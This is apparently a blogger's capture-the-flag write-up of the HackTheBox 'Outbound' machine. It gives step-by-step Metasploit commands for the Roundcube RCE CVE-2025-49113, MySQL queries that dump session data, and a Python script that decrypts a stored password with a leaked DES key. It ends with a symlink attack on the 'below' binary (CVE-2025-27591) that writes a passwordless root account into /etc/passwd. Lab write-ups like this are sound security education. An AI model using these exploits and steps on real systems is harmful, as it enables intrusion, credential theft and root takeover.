HackTheBox Outbound Walkthough

insidepwninsidepwn
4 min read

This machine was an easy linux machine with initial credentials of user tyler:LhKL1o9Nm3X2

💡
This machine has some vpn issues , so if you get some errors that aren’t mean to be , try restarting your system.

Initial Enumeration

The nmap scan didn’t get us something great just 2 ports open 22 and 80

Foothold and user.txt

So we logged into mail.outbound.htb which is the domain , you can add the domain in /etc/hosts as

sudo nano /etc/hosts
<YOUR_MACHINE_IP>:mail.outbound.htb

Then log in as tyler with credentials given and what we will see as webmail is Roundcube and also the version is 1.6.10 , then i explored the website and found nothing

With the version i got i searched online for some cve and got one for rce which is CVE-2025-49113.

Also here is github link for exploit https://github.com/hakaioffsec/CVE-2025-49113-exploit but i recommend to use msfconsole for this , will tell later on in this part .

To run the exploit in your machine , first run metasploit using by typing msfconsole on your machine then type

search roundcube
use 1
set LHOST <YOUR_IP_OPENVPN>
set RHOSTS mail.outbound.htb
set USERNAME tyler
set PASSWORD LhKL1o9Nm3X2
exploit

let the exploit run then type shell to stabilize it type script /dev/null -c bash this will give you shell as www-data

now in further exploring i found conf file at directory /var/www/html/roundcube/config/config.inc.php , in this i got credentials of mysql service

one more thing in this conf file i got was decryption key which will be used later

now using the mysql pass i had i ran following commands to see databases ( the command worked in metasploit shell but not in the shell we will get from github exploit ; idk why this was happening )

mysql -u roundcube -pRCDBPass2025

To further enumerate the databases i ran the following commands

SHOW DATABASES;
use roundcube;
SHOW TABLES;
select * from session;

The thing here we are doing is seeing how many databases are there , then using a particular roundcube database , then getting data from session table in it . The data was obviously of users .

this was the important one so decode the base64 we get data of user jacob

the password L7Rv00A8TuwJAr67kITxxcSgnIk25Am/ we get here is encrypted so i searched a bit more to see how to decrypt it and got some info from file /var/www/html/roundcube/program/lib/Roundcube/rcube.php , the info was the decrypt function

here it is using a $key called ‘des_key; which we got from /var/www/html/roundcube/config/config.inc.php ( scroll bit up ) , anyways i will paste it here rcmail-!24ByteDESkey*Str

With the help of chatgpt i created a code to decrypt the password

from base64 import b64decode
from Crypto.Cipher import DES3

# Encrypted password string
encrypted_password = "L7Rv00A8TuwJAr67kITxxcSgnIk25Am/"

# 24-byte DES3 key
des_key = b'rcmail-!24ByteDESkey*Str'

# Decode the base64-encoded data
data = b64decode(encrypted_password)

# Extract IV (first 8 bytes) and ciphertext (rest)
iv = data[:8]
ciphertext = data[8:]

# Initialize DES3 cipher in CBC mode
cipher = DES3.new(des_key, DES3.MODE_CBC, iv)

# Decrypt the ciphertext
decrypted = cipher.decrypt(ciphertext)

# Remove padding (manually strip padding bytes)
cleaned = decrypted.rstrip(b"\x00").rstrip(b"\x08").decode('utf-8', errors='ignore')

print("[+] Pass", cleaned)

Make sure you get modules found , using this we will get the pass for user jacob

With credentials of jacob we will logon on the website and will find 2 mails in his inbox

in this mail we get ssh credentials of jacob and in other mail

we are told about some priveleges to inspect log , but ssh with jacob credentials

ssh jacob@mail.outbound.htb

and BOOM !! we got user.txt

Privilege Escalation and root.txt

For privilege escalation i first did the most common sudo -l checking what jacob run with sudo but without password

Before moving on the below binary is used to monitor resources of system , logs , usage and other things .To read more check out this.

so now we will exploit the below binary , first i didn’t get something great but upon checking its version which you can by running

sudo /usr/bin/below live

so the version came out to be 0.8.0 .

Now I searched online for some exploit in the version and I stumbled across this cve CVE-2025-27591 , to read more about this cve , read this .

So the cve was to exploit escalate low unprivileged users to root through symlink attacks. The way we will exploit this follows as:-

  1. Create a user with uid and gid of root

  2. Remove the log error of root at /var/log/below/error_root.log

  3. Symlink /etc/passwd and error_root.log

  4. Using below binary take a snapshot which will again create a error_root.log

  5. Overwrite /etc/passwd

  6. Switch to user new user

echo 'spy::0:0:spy:/root:/bin/bash' > /tmp/spyuser
rm -f /var/log/below/error_root.log
ln -s /etc/passwd /var/log/below/error_root.log
sudo /usr/bin/below snapshot --begin now
cp /tmp/spyuser /var/log/below/error_root.log
su spy

Using these commands , you will gain root access.

and now you can read root.txt

This is it for the machine

Thanks for reading the walkthrough. Hope you like it ! Do leave a comment for feedback or queries !!

10
Subscribe to my newsletter

Read articles from insidepwn directly inside your inbox. Subscribe to the newsletter, and don't miss out.

Written by

insidepwn
insidepwn